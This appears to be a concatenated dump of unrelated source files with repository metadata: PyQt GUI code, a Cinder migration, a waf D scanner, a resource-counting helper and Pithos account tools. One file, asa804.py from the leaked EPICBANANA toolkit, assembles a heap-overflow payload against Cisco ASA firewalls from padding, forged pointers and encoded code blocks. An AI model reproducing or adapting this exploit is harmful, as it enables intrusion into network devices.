self.actionCloseFigure.setObjectName(_fromUtf8("actionCloseFigure"))
self.actionCloseDataSource = QtGui.QAction(Windows_Main)
self.actionCloseDataSource.setEnabled(False)
self.actionCloseDataSource.setText(QtGui.QApplication.translate("Windows_Main", "&Close", None, QtGui.QApplication.UnicodeUTF8))
self.actionCloseDataSource.setObjectName(_fromUtf8("actionCloseDataSource"))
self.actionNewLogEval = QtGui.QAction(Windows_Main)
self.actionNewLogEval.setText(QtGui.QApplication.translate("Windows_Main", "LogEval", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewLogEval.setObjectName(_fromUtf8("actionNewLogEval"))
self.actionNewTimeSeries = QtGui.QAction(Windows_Main)
self.actionNewTimeSeries.setText(QtGui.QApplication.translate("Windows_Main", "TimeSeries", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewTimeSeries.setObjectName(_fromUtf8("actionNewTimeSeries"))
self.actionNewLRE = QtGui.QAction(Windows_Main)
self.actionNewLRE.setText(QtGui.QApplication.translate("Windows_Main", "(D)LRE", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewLRE.setObjectName(_fromUtf8("actionNewLRE"))
self.actionNewBatchMeans = QtGui.QAction(Windows_Main)
self.actionNewBatchMeans.setText(QtGui.QApplication.translate("Windows_Main", "BatchMeans", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewBatchMeans.setObjectName(_fromUtf8("actionNewBatchMeans"))
self.actionNewTable = QtGui.QAction(Windows_Main)
self.actionNewTable.setText(QtGui.QApplication.translate("Windows_Main", "Table", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewTable.setObjectName(_fromUtf8("actionNewTable"))
self.actionNewXDF = QtGui.QAction(Windows_Main)
self.actionNewXDF.setText(QtGui.QApplication.translate("Windows_Main", "PDF/CDF/CCDF", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewXDF.setObjectName(_fromUtf8("actionNewXDF"))
self.actionNewParameter = QtGui.QAction(Windows_Main)
self.actionNewParameter.setText(QtGui.QApplication.translate("Windows_Main", "Parameter", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewParameter.setObjectName(_fromUtf8("actionNewParameter"))
self.actionConfigure = QtGui.QAction(Windows_Main)
self.actionConfigure.setText(QtGui.QApplication.translate("Windows_Main", "C&onfigure...", None, QtGui.QApplication.UnicodeUTF8))
self.actionConfigure.setObjectName(_fromUtf8("actionConfigure"))
self.actionOpenCampaignDatabase = QtGui.QAction(Windows_Main)
self.actionOpenCampaignDatabase.setText(QtGui.QApplication.translate("Windows_Main", "Open &Campaign Database", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenCampaignDatabase.setObjectName(_fromUtf8("actionOpenCampaignDatabase"))
self.actionRefresh = QtGui.QAction(Windows_Main)
self.actionRefresh.setText(QtGui.QApplication.translate("Windows_Main", "&Refresh", None, QtGui.QApplication.UnicodeUTF8))
self.actionRefresh.setObjectName(_fromUtf8("actionRefresh"))
self.actionView_Scenario = QtGui.QAction(Windows_Main)
self.actionView_Scenario.setText(QtGui.QApplication.translate("Windows_Main", "View &Scenario", None, QtGui.QApplication.UnicodeUTF8))
self.actionView_Scenario.setObjectName(_fromUtf8("actionView_Scenario"))
self.actionPreferences = QtGui.QAction(Windows_Main)
self.actionPreferences.setText(QtGui.QApplication.translate("Windows_Main", "Preferences", None, QtGui.QApplication.UnicodeUTF8))
self.actionPreferences.setObjectName(_fromUtf8("actionPreferences"))
self.actionView_CouchDB_Trace = QtGui.QAction(Windows_Main)
self.actionView_CouchDB_Trace.setText(QtGui.QApplication.translate("Windows_Main", "View CouchDB Trace", None, QtGui.QApplication.UnicodeUTF8))
self.actionView_CouchDB_Trace.setObjectName(_fromUtf8("actionView_CouchDB_Trace"))
self.menuFile.addAction(self.actionCloseDataSource)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionView_Scenario)
self.menuFile.addAction(self.actionView_CouchDB_Trace)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionRefresh)
self.menuFile.addAction(self.actionQuit)
self.menubar.addAction(self.menuFile.menuAction())
self.retranslateUi(Windows_Main)
QtCore.QObject.connect(self.actionQuit, QtCore.SIGNAL(_fromUtf8("activated()")), Windows_Main.close)
QtCore.QMetaObject.connectSlotsByName(Windows_Main)
def retranslateUi(self, Windows_Main):
pass
import viewer_rc
| gpl-2.0 | -7,998,344,511,708,677,000 | 69.550388 | 158 | 0.745413 | false |
tlakshman26/cinder-https-changes | cinder/db/sqlalchemy/migrate_repo/versions/037_add_cgsnapshot_id_column_to_consistencygroups.py | 20 | 1371 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import Column
from sqlalchemy import MetaData, String, Table
def upgrade(migrate_engine):
"""Add cgsnapshot_id column to consistencygroups."""
meta = MetaData()
meta.bind = migrate_engine
consistencygroups = Table('consistencygroups', meta, autoload=True)
cgsnapshot_id = Column('cgsnapshot_id', String(36))
consistencygroups.create_column(cgsnapshot_id)
consistencygroups.update().values(cgsnapshot_id=None).execute()
def downgrade(migrate_engine):
"""Remove cgsnapshot_id column from consistencygroups."""
meta = MetaData()
meta.bind = migrate_engine
consistencygroups = Table('consistencygroups', meta, autoload=True)
cgsnapshot_id = consistencygroups.columns.cgsnapshot_id
consistencygroups.drop_column(cgsnapshot_id)
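# Roughly equivalent DDL (illustrative only; the exact column type rendering
# depends on the database backend):
#   upgrade:   ALTER TABLE consistencygroups ADD COLUMN cgsnapshot_id VARCHAR(36);
#   downgrade: ALTER TABLE consistencygroups DROP COLUMN cgsnapshot_id;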
| apache-2.0 | 5,296,566,347,016,533,000 | 36.054054 | 78 | 0.73523 | false |
DarthMaulware/EquationGroupLeaks | Leak #1 - Equation Group Cyber Weapons Auction - Invitation/EQGRP-Free-File/Firewall/EXPLOITS/EPBA/EPICBANANA/versions/asa804.py | 1 | 2673 | from params import *
from util import *
from asa804_loader import *
def payload(params):
block_enc = []
while len(block_enc) == 0:
mask_byte = ord(rand_byte()) # one byte, used as an int
#print "trying to mask data with 0x%02x" % mask_byte
block_enc = prepare_blocks(params, mask_byte,
block1_decoder, cleanup, block_decoder, blocks_table, epba_exit,
free_addrs, block)
if block_enc == False:
print "failed to prepare blocks!"
return ""
# prepare the payload
payload = ""
# drop 413 bytes for overflow to offset 1372 in getline
# sequence is K-Y-Y-Y-Y
# 15 blocks of free memory, 13 for code
# We pad with 0x08 here so that 4 bytes of padding is
# a valid address.
payload += ctrl_v_escape("\x08" * 242)
payload += ctrl_v_escape(valid_prev) # new prev
payload += ctrl_v_escape(neg_index) # -20
payload += ctrl_v_escape(neg_index) # -20
payload += ctrl_v_escape(free_addrs[0]) # where blob drops
payload += ctrl_v_escape(free_addrs[1]) # first real code drops here
payload += ctrl_v_escape(free_addrs[2])
payload += ctrl_v_escape(free_addrs[3])
payload += ctrl_v_escape(free_addrs[4])
payload += ctrl_v_escape(free_addrs[5])
payload += ctrl_v_escape(free_addrs[6])
payload += ctrl_v_escape(free_addrs[7])
payload += ctrl_v_escape(free_addrs[8])
payload += ctrl_v_escape(free_addrs[9])
payload += ctrl_v_escape(free_addrs[10])
payload += ctrl_v_escape(free_addrs[11])
payload += ctrl_v_escape(free_addrs[12])
payload += ctrl_v_escape(free_addrs[13]) # last real code
payload += ctrl_v_escape(free_addrs[14]) # overwrite the free ptr
payload += ctrl_v_escape("\x08" * 99)
payload += OVERWRITE + KILL + (YANK * 4) + LINEFEED
payload += ctrl_v_escape(block_enc[1]) + LINEFEED
payload += ctrl_v_escape(block_enc[2]) + LINEFEED
payload += ctrl_v_escape(block_enc[3]) + LINEFEED
payload += ctrl_v_escape(block_enc[4]) + LINEFEED
payload += ctrl_v_escape(block_enc[5]) + LINEFEED
payload += ctrl_v_escape(block_enc[6]) + LINEFEED
payload += ctrl_v_escape(block_enc[7]) + LINEFEED
payload += ctrl_v_escape(block_enc[8]) + LINEFEED
payload += ctrl_v_escape(block_enc[9]) + LINEFEED
payload += ctrl_v_escape(block_enc[10]) + LINEFEED
payload += ctrl_v_escape(block_enc[11]) + LINEFEED
payload += ctrl_v_escape(block_enc[12]) + LINEFEED
payload += ctrl_v_escape(block_enc[13]) + LINEFEED
payload += ctrl_v_escape(block_enc[14]) + LINEFEED
return(payload)
| unlicense | -5,213,213,743,489,663,000 | 40.123077 | 99 | 0.617284 | false |
blablack/ams-lv2 | waflib/Tools/d_scan.py | 16 | 5052 | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2016-2018 (ita)
"""
Provide a scanner for finding dependencies on d files
"""
import re
from waflib import Utils
def filter_comments(filename):
"""
:param filename: d file name
:type filename: string
:rtype: list
:return: a list of characters
"""
txt = Utils.readf(filename)
i = 0
buf = []
max = len(txt)
begin = 0
while i < max:
c = txt[i]
if c == '"' or c == "'": # skip a string or character literal
buf.append(txt[begin:i])
delim = c
i += 1
while i < max:
c = txt[i]
if c == delim:
break
elif c == '\\': # skip the character following backslash
i += 1
i += 1
i += 1
begin = i
elif c == '/': # try to replace a comment with whitespace
buf.append(txt[begin:i])
i += 1
if i == max:
break
c = txt[i]
if c == '+': # eat nesting /+ +/ comment
i += 1
nesting = 1
c = None
while i < max:
prev = c
c = txt[i]
if prev == '/' and c == '+':
nesting += 1
c = None
elif prev == '+' and c == '/':
nesting -= 1
if nesting == 0:
break
c = None
i += 1
elif c == '*': # eat /* */ comment
i += 1
c = None
while i < max:
prev = c
c = txt[i]
if prev == '*' and c == '/':
break
i += 1
elif c == '/': # eat // comment
i += 1
while i < max and txt[i] != '\n':
i += 1
else: # no comment
begin = i - 1
continue
i += 1
begin = i
buf.append(' ')
else:
i += 1
buf.append(txt[begin:])
return buf
class d_parser(object):
"""
Parser for d files
"""
def __init__(self, env, incpaths):
#self.code = ''
#self.module = ''
#self.imports = []
self.allnames = []
self.re_module = re.compile("module\s+([^;]+)")
self.re_import = re.compile("import\s+([^;]+)")
self.re_import_bindings = re.compile("([^:]+):(.*)")
self.re_import_alias = re.compile("[^=]+=(.+)")
self.env = env
self.nodes = []
self.names = []
self.incpaths = incpaths
def tryfind(self, filename):
"""
Search file a file matching an module/import directive
:param filename: file to read
:type filename: string
"""
found = 0
for n in self.incpaths:
found = n.find_resource(filename.replace('.', '/') + '.d')
if found:
self.nodes.append(found)
self.waiting.append(found)
break
if not found:
if not filename in self.names:
self.names.append(filename)
def get_strings(self, code):
"""
:param code: d code to parse
:type code: string
:return: the modules that the code uses
:rtype: a list of match objects
"""
#self.imports = []
self.module = ''
lst = []
# get the module name (if present)
mod_name = self.re_module.search(code)
if mod_name:
self.module = re.sub('\s+', '', mod_name.group(1)) # strip all whitespaces
# go through the code, have a look at all import occurrences
# first, lets look at anything beginning with "import" and ending with ";"
import_iterator = self.re_import.finditer(code)
if import_iterator:
for import_match in import_iterator:
import_match_str = re.sub('\s+', '', import_match.group(1)) # strip all whitespaces
# does this end with an import bindings declaration?
# (import bindings always terminate the list of imports)
bindings_match = self.re_import_bindings.match(import_match_str)
if bindings_match:
import_match_str = bindings_match.group(1)
# if so, extract the part before the ":" (since the module declaration(s) is/are located there)
# split the matching string into a bunch of strings, separated by a comma
matches = import_match_str.split(',')
for match in matches:
alias_match = self.re_import_alias.match(match)
if alias_match:
# is this an alias declaration? (alias = module name) if so, extract the module name
match = alias_match.group(1)
lst.append(match)
return lst
def start(self, node):
"""
The parsing starts here
:param node: input file
:type node: :py:class:`waflib.Node.Node`
"""
self.waiting = [node]
# while the stack is not empty, add the dependencies
while self.waiting:
nd = self.waiting.pop(0)
self.iter(nd)
def iter(self, node):
"""
Find all the modules that a file depends on, uses :py:meth:`waflib.Tools.d_scan.d_parser.tryfind` to process dependent files
:param node: input file
:type node: :py:class:`waflib.Node.Node`
"""
path = node.abspath() # obtain the absolute path
code = "".join(filter_comments(path)) # read the file and filter the comments
names = self.get_strings(code) # obtain the import strings
for x in names:
# optimization
if x in self.allnames:
continue
self.allnames.append(x)
# for each name, see if it is like a node or not
self.tryfind(x)
def scan(self):
"look for .d/.di used by a d file"
env = self.env
gruik = d_parser(env, self.generator.includes_nodes)
node = self.inputs[0]
gruik.start(node)
nodes = gruik.nodes
names = gruik.names
return (nodes, names)
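# For instance (illustrative, not part of the original scanner), the regexes in
# d_parser.get_strings() resolve imports, bindings and aliases like this:
#
#     d_parser(None, []).get_strings('import std.stdio, io = std.string;')
#     # -> ['std.stdio', 'std.string']   (the alias "io" maps to its module)
#     d_parser(None, []).get_strings('import std.stdio : writeln;')
#     # -> ['std.stdio']                 (bindings after ":" end the import list)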
| gpl-2.0 | 8,168,800,896,246,255,000 | 22.943128 | 126 | 0.60669 | false |
krzykwas/rhqagent | pyagent/test/data/model/PastMeasurementsManagerTest.py | 1 | 3503 | #-*- coding: utf-8 -*-
#
# Krzysztof „krzykwas” Kwaśniewski
# Gdańsk, 15-07-2012
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from ....data.model.Measurement import Measurement
from ....data.model.PastMeasurementsManager import PastMeasurementsManager
import unittest
class PastMeasurementsManagerTest(unittest.TestCase):
def setUp(self):
self.__PERIOD = 3
self.__sut = PastMeasurementsManager(self.__PERIOD)
def test_get_InvokedOnEmptyManager_ReturnsAListOfCorrectLength(self):
actual = len(self.__sut.get("srcServer", "mappedObject"))
self.assertEqual(3, actual, "List of wrong length returned")
def test_get_WhenOneMeasurementMissing_AFakeOneIsCreatedWithDataProperlyCopiedFromTheOldestOne(self):
srcServer = "srcServer"
mappedObject = "mappedObject"
mapping1 = "dst-server-mapping-1"
mapping2 = "dst-server-mapping-2"
timestamp1 = "timestamp-1"
timestamp2 = "timestamp-2"
#This measurement is added first, so it's the oldest one!
measurement1 = Measurement(srcServer, mappedObject, mapping1, 0, timestamp1)
self.__sut.put(srcServer, mappedObject, measurement1)
measurement2 = Measurement(srcServer, mappedObject, mapping2, 0, timestamp2)
self.__sut.put(srcServer, mappedObject, measurement2)
fakeMeasurement = self.__sut.get(srcServer, mappedObject)[-1]
self.assertEqual(
mapping1,
fakeMeasurement.getDstServerMapping(),
"dstServerMapping value: {0} incorrectly copied to fake measurement".format(fakeMeasurement.getDstServerMapping())
)
self.assertEqual(
timestamp1,
fakeMeasurement.getTimestamp(),
"timestamp value: {0} incorrectly copied to fake measurement".format(fakeMeasurement.getTimestamp())
)
def test_put_WhenFirstMeasurementAddedForCertainSrcServerAndMappedObject_NoExceptionRaised(self):
try:
self.__sut.put("srcServer", "mappedObject", "measurement")
except Exception as e:
self.fail("Exception {0} raised unexpectedly".format(e))
def test_put_WhenMoreThanPeriodMeasurementsAdded_OldestGetForgotten(self):
srcServer = "srcServer"
mappedObject = "mappedObject"
#measurement1 is the oldest one!
measurement1 = Measurement(srcServer, mappedObject, "dstServerMapping1", 1, "timestamp1")
measurement2 = Measurement(srcServer, mappedObject, "dstServerMapping2", 2, "timestamp2")
measurement3 = Measurement(srcServer, mappedObject, "dstServerMapping3", 3, "timestamp3")
measurement4 = Measurement(srcServer, mappedObject, "dstServerMapping4", 4, "timestamp4")
self.__sut.put(srcServer, mappedObject, measurement1)
self.__sut.put(srcServer, mappedObject, measurement2)
self.__sut.put(srcServer, mappedObject, measurement3)
self.__sut.put(srcServer, mappedObject, measurement4)
expected = [measurement4, measurement3, measurement2]
actual = self.__sut.get(srcServer, mappedObject)
self.assertListEqual(expected, actual, "Incorrect measurements returned")
| gpl-3.0 | 2,079,253,867,258,000,000 | 38.738636 | 117 | 0.76294 | false |
hehewa/pytorchStudy | methods_exist/Regression/REGRESSION.py | 1 | 1796 | #!/usr/bin/env python
from __future__ import print_function
from itertools import count
import torch
import torch.autograd
import torch.nn.functional as F
from torch.autograd import Variable
import matplotlib.pyplot as plt
import numpy as np
POLY_DEGREE = 4
W_target = torch.randn(POLY_DEGREE, 1) * 5
b_target = torch.randn(1) * 5
def make_features(x):
"""Builds features i.e. a matrix with columns [x, x^2, x^3, x^4]."""
    x = x.unsqueeze(1)  # unsqueeze turns the 1-D input into an (N, 1) column matrix
return torch.cat([x ** i for i in range(1, POLY_DEGREE+1)], 1)
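# Worked example: for input x = [2., 3.] this produces a 2 x POLY_DEGREE matrix
# [[2., 4., 8., 16.], [3., 9., 27., 81.]] -- one row per sample, one column per power.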
def f(x):
"""Approximated function."""
return x.mm(W_target) + b_target[0]
def poly_desc(W, b):
"""Creates a string description of a polynomial."""
result = 'y = '
for i, w in enumerate(W):
result += '{:+.2f} x^{} '.format(w, len(W) - i)
result += '{:+.2f}'.format(b[0])
return result
def get_batch(batch_size=32):
"""Builds a batch i.e. (x, f(x)) pair."""
random = torch.randn(batch_size)
x = make_features(random)
y = f(x)
return Variable(x), Variable(y)
# Define model
fc = torch.nn.Linear(W_target.size(0), 1)
for batch_idx in count(1):
# Get data
batch_x, batch_y = get_batch()
# Reset gradients
fc.zero_grad()
# Forward pass
output = F.smooth_l1_loss(fc(batch_x), batch_y)
loss = output.data[0]
# Backward pass
output.backward()
# Apply gradients
for param in fc.parameters():
param.data.add_(-0.1 * param.grad.data)
# Stop criterion
if loss < 1e-3:
break
print('Loss: {:.6f} after {} batches'.format(loss, batch_idx))
print('==> Learned function:\t' + poly_desc(fc.weight.data.view(-1), fc.bias.data))
print('==> Actual function:\t' + poly_desc(W_target.view(-1), b_target)) | apache-2.0 | -5,541,937,584,037,717,000 | 23.958333 | 83 | 0.625278 | false |
Bauble/bauble.classic | scripts/bauble-upgrade-0.6-to-0.7.py | 3 | 5641 | #!/usr/bin/env python
# this script needs both a connections to a database created with bauble 0.6.x
# and the csv files exported from the same database, it will create a directory
# called 0.7 in the same directory as the exported csv files with the new
# converted files...you will also need the default geography data to have
# functioning database
# What has changed from 0.6->0.7 ?
# ------------------
# - species.id_qual column is now accession.id_qual column, any species
# specific id_qual data should be moved to the accessions with that species
# - accession.country_id is now accession.geography_id, try to find a match
# for the country_id if there is one in the geography table
# - species_meta is no more, this means that all the previous distribution data
# won't match up, it would be good if we could find a string match and add this
# to the new species_distribution table
import csv
import os
import shutil
import sys
from optparse import OptionParser
from bauble.plugins.geography import *
from migrate.run import *
from sqlalchemy import *
import bauble
from bauble.plugins.plants import *
#import bauble.pluginmgr as pluginmgr
parser = OptionParser()
parser.add_option('-c', '--conn', dest='conn', help='the db connection uri',
metavar='CONN')
(options, args) = parser.parse_args()
if options.conn is None:
parser.error('a database uri is required')
# a directory full of CSV text files exported from Bauble 0.6
src_path = None
print args
if len(args) == 0:
src_path = os.getcwd()
else:
src_path = args[0]
if not os.path.exists(src_path):
parser.error('%s does not exist' % src_path)
# where to put the new files
dst_path = os.path.join(src_path, '0.7')
if not os.path.exists(dst_path):
os.mkdir(dst_path)
global_connect(options.conn)
engine = default_metadata.engine
session = create_session()
major, minor, rev = bauble.version
if minor != 6:
print '** Error: This script will only upgrade from bauble 0.6'
sys.exit(1)
def quote(s):
if s is None:
return ''
elif isinstance(s, (str, unicode)):
return '"%s"' % s
return '%s' % s
QUOTE_STYLE = csv.QUOTE_MINIMAL
QUOTE_CHAR = '"'
def write_csv(filename, rows):
f = file(filename, 'wb')
writer = csv.writer(f, quotechar=QUOTE_CHAR, quoting=QUOTE_STYLE)
writer.writerows(rows)
f.close()
def migrate_idqual():
print 'migrating idqual'
# select all species that have idqual set
#species = species.select(id_qual != None)
sp_results = select([species_table.c.id, species_table.c.id_qual],
species_table.c.id_qual != None).execute()
# print sp_results
acc_cols = accession_table.c.keys()
new_cols = acc_cols[:]
new_cols.append('id_qual')
rows = []
rows.append(new_cols)
# copy the accessions whose species have id_qual
for sp_id, sp_idqual in sp_results:
for acc in accession_table.select(accession_table.c.species_id==sp_id).execute():
v = [acc[c] for c in acc_cols]
v.append('%s' % sp_idqual)
rows.append(v)
    # copy the rest of the accessions that don't have id_qual
sp_results = select([species_table.c.id],
species_table.c.id_qual == None)
for acc in accession_table.select(accession_table.c.species_id.in_(sp_results)).execute():
v = [acc[c] for c in acc_cols]
v.append(None)
rows.append(v)
write_csv(os.path.join(dst_path, 'accession.txt'), rows)
    # copy the species and remove the id_qual column
rows = []
sp_cols = species_table.c.keys()
sp_cols.remove('id_qual')
rows.append(sp_cols)
for sp in species_table.select().execute():
v = [sp[c] for c in sp_cols]
rows.append(v)
write_csv(os.path.join(dst_path, 'species.txt'), rows)
def migrate_distribution():
# TODO: this would need to connect to a 0.7 database to search
# for matching distribution data
# *** we could just start over with the distribution data and forget about
# trying to migrate it
pass
def migrate_accession_geography():
pass
# r = session.query(Accession).select(accession_table.c.country_id!=None)
# assert len(r) == 0
# TODO: update bauble meta
# TODO: create a registry
# TODO: it might make more sense to make some of the changes and then dump the
# data to and import it again to make sure things like the meta table and
# registry are created correctly
# TODO: the other options is to create a select statement that will create
# the columns we want to import
# TODO: how to use this script...export all tables from bauble first,
# This script will :
# 1. Create some CSV text files for importing into a Bauble 0.7
# database
# 2. Copy the rest of the CSV text files from a source directory into a
# destination that should also be imported into a new Bauble 0.7 database
#
# Basically this script will create a directory full of CSV files that
# can be imported into a Bauble 0.7 database.
# run this script and use the files it outputs in place of the ones from
migrate_accession_geography()
migrate_idqual()
migrate_distribution()
copy_list = ['donor.txt', 'family_synonym.txt', 'family.txt',
'species_synonym.txt', 'genus_synonym.txt', 'genus.txt',
'collection.txt', 'tagged_obj.txt', 'location.txt', 'tag.txt',
'verification.txt', 'default_vernacular_name.txt',
'plant_history.txt', 'vernacular_name.txt', 'donation.txt',
'plant.txt']
for f in copy_list:
print 'copying %s' % f
shutil.copy(os.path.join(src_path, f), dst_path)
| gpl-2.0 | 5,320,437,833,767,806,000 | 30.870056 | 94 | 0.674349 | false |
silly-wacky-3-town-toon/SOURCE-COD | Panda3D-1.10.0/direct/showbase/CountedResource.py | 11 | 7016 |
class CountedResource(object):
"""
This class is an attempt to combine the RAIA idiom with reference
counting semantics in order to model shared resources. RAIA stands
for "Resource Allocation Is Acquisition" (see 'Effective C++' for a
more in-depth explanation)
When a resource is needed, create an appropriate CountedResource
object. If the resource is already available (meaning another
CountedResource object of the same type already exists), no action
is taken. Otherwise, acquire() is invoked, and the resource is
allocated. The resource will remain valid until all matching
CountedResource objects have been deleted. When no objects of
a particular CountedResource type exist, the release() function for
that type is invoked and the managed resource is cleaned up.
Usage:
Define a subclass of CountedResource that defines the
@classmethods acquire() and release(). In these two
functions, define your resource allocation and cleanup code.
IMPORTANT:
If you define your own __init__ and __del__ methods, you
MUST be sure to call down to the ones defined in
CountedResource.
Notes:
Until we figure out a way to wrangle a bit more functionality
out of Python, you MUST NOT inherit from any class that has
CountedResource as its base class. In debug mode, this will
raise a runtime assertion during the invalid class's call to
__init__(). If you have more than one resource that you want to
manage/access with a single object, you should subclass
CountedResource again. See the example code at the bottom of
this file to see how to accomplish this (This is useful for
dependent resources).
"""
@classmethod
def incrementCounter(cls):
try:
cls.RESOURCE_COUNTER += 1
except AttributeError:
cls.RESOURCE_COUNTER = 1
if cls.RESOURCE_COUNTER == 1:
cls.acquire()
@classmethod
def decrementCounter(cls):
try:
cls.RESOURCE_COUNTER_INIT_FAILED
del cls.RESOURCE_COUNTER_INIT_FAILED
except AttributeError:
cls.RESOURCE_COUNTER -= 1
if cls.RESOURCE_COUNTER < 1:
cls.release()
@classmethod
def getCount(cls):
return cls.RESOURCE_COUNTER
@classmethod
def acquire(cls):
pass
@classmethod
def release(cls):
pass
def __init__(self):
cls = type(self)
cls.RESOURCE_COUNTER_INIT_FAILED = True
assert cls.mro()[1] == CountedResource, \
(lambda: \
'%s cannot be subclassed.' \
% cls.mro()[list(cls.mro()).index(CountedResource) - 1].__name__)()
del cls.RESOURCE_COUNTER_INIT_FAILED
self.incrementCounter()
def __del__(self):
self.decrementCounter()
if __debug__ and __name__ == '__main__':
class MouseResource(CountedResource):
"""
A simple class to demonstrate the acquisition of a resource.
"""
@classmethod
def acquire(cls):
# The call to the super-class's acquire() is
# not necessary at the moment, but may be in
# the future, so do it now for good measure.
super(MouseResource, cls).acquire()
# Now acquire the resource this class is
# managing.
print '-- Acquire Mouse'
@classmethod
def release(cls):
# First, release the resource this class is
# managing.
print '-- Release Mouse'
# The call to the super-class's release() is
# not necessary at the moment, but may be in
# the future, so do it now for good measure.
super(MouseResource, cls).release()
def __init__(self):
super(MouseResource, self).__init__()
def __del__(self):
super(MouseResource, self).__del__()
class CursorResource(CountedResource):
"""
A class to demonstrate how to implement a dependent
resource. Notice how this class also inherits from
CountedResource. Instead of subclassing MouseCounter,
we will just acquire it in our __init__() and release
it in our __del__().
"""
@classmethod
def acquire(cls):
super(CursorResource, cls).acquire()
print '-- Acquire Cursor'
@classmethod
def release(cls):
print '-- Release Cursor'
super(CursorResource, cls).release()
def __init__(self):
# The required resource references should
# be stored on 'self' since we want to
# release it when the object is deleted.
self.__mouseResource = MouseResource()
# Call the super-classes __init__()
# after all required resources are
# referenced.
super(CursorResource, self).__init__()
def __del__(self):
# Free up the most dependent resource
# first, the one this class is managing.
super(CursorResource, self).__del__()
# Now unlink any required resources.
del self.__mouseResource
class InvalidResource(MouseResource):
@classmethod
def acquire(cls):
super(InvalidResource, cls).acquire()
print '-- Acquire Invalid'
@classmethod
def release(cls):
print '-- Release Invalid'
super(InvalidResource, cls).release()
print '\nAllocate Mouse'
m = MouseResource()
print 'Free up Mouse'
del m
print '\nAllocate Cursor'
c = CursorResource()
print 'Free up Cursor'
del c
print '\nAllocate Mouse then Cursor'
m = MouseResource()
c = CursorResource()
print 'Free up Cursor'
del c
print 'Free up Mouse'
del m
print '\nAllocate Mouse then Cursor'
m = MouseResource()
c = CursorResource()
print 'Free up Mouse'
del m
print 'Free up Cursor'
del c
print '\nAllocate Cursor then Mouse'
c = CursorResource()
m = MouseResource()
print 'Free up Mouse'
del m
print 'Free up Cursor'
del c
print '\nAllocate Cursor then Mouse'
c = CursorResource()
m = MouseResource()
print 'Free up Cursor'
del c
# example of an invalid subclass
try:
print '\nAllocate Invalid'
i = InvalidResource()
print 'Free up Invalid'
except AssertionError,e:
print e
print
print 'Free up Mouse'
del m
def demoFunc():
print '\nAllocate Cursor within function'
c = CursorResource()
print 'Cursor will be freed on function exit'
demoFunc()
| apache-2.0 | 5,393,298,083,505,471,000 | 29.504348 | 84 | 0.585946 | false |
cstavr/synnefo | snf-pithos-app/pithos/api/manage_accounts/__init__.py | 10 | 15419 | # Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
import os
from functools import wraps
os.environ['DJANGO_SETTINGS_MODULE'] = 'synnefo.settings'
from pithos.api.util import (get_backend, split_container_object_string,
Checksum, NoChecksum)
def data_read_iterator(str, size=1024):
offset = 0
while True:
data = str[offset:offset + size]
offset = offset + size
if not data:
break
yield data
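# Illustrative sketch (not part of the original source): chunking a 5-byte
# string into 2-byte pieces yields 'ab', 'cd', 'e':
#   list(data_read_iterator('abcde', size=2))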
def manage_transactions(lock_container_path=False):
"""Decorator function for ManageAccounts methods."""
def decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
self.backend.pre_exec(lock_container_path)
try:
result = func(self, *args, **kwargs)
except:
self.backend.post_exec(False)
raise
else:
dry = kwargs.get('dry', False)
if dry:
self.backend.post_exec(False)
else:
self.backend.post_exec(True)
return result
return wrapper
return decorator
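# Illustrative usage sketch (account names below are assumptions, not from
# this module): every ManageAccounts method wrapped by @manage_transactions()
# accepts a ``dry`` keyword; with dry=True the call still runs but the backend
# transaction is rolled back instead of committed, e.g.
#   utils = ManageAccounts()
#   utils.merge_account('old@example.com', 'new@example.com',
#                       only_stats=False, dry=True, silent=True)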
class ManageAccounts():
def __init__(self):
self.backend = get_backend()
def cleanup(self):
self.backend.close()
def _existing_accounts(self):
l = sorted([path for path, _ in self.backend.node.node_accounts()])
return l
@manage_transactions()
def existing_accounts(self):
return self._existing_accounts()
@manage_transactions()
def duplicate_accounts(self):
accounts = self._existing_accounts()
duplicates = []
for i in range(len(accounts)):
account = accounts[i]
matcher = re.compile(account, re.IGNORECASE)
duplicate = filter(matcher.match, (i for i in accounts[i + 1:] if
len(i) == len(account)))
if duplicate:
duplicate.insert(0, account)
duplicates.append(duplicate)
return duplicates
def _list_all_containers(self, account, step=10):
containers = []
marker = None
while 1:
more = self.backend.list_containers(account, account, limit=10,
marker=marker)
if not more:
break
containers.extend(more)
marker = more[-1]
return containers
@manage_transactions()
def list_all_containers(self, account, step=10):
return self._list_all_containers(account, step)
def _list_all_container_objects(self, account, container, virtual=False):
objects = []
marker = None
while 1:
more = self.backend.list_objects(account, account, container,
marker=marker, virtual=virtual)
if not more:
break
objects.extend((i[0] for i in more))
marker = more[-1][0]
return objects
@manage_transactions()
def list_all_container_objects(self, account, container, virtual=False):
return self._list_all_container_objects(account, container, virtual)
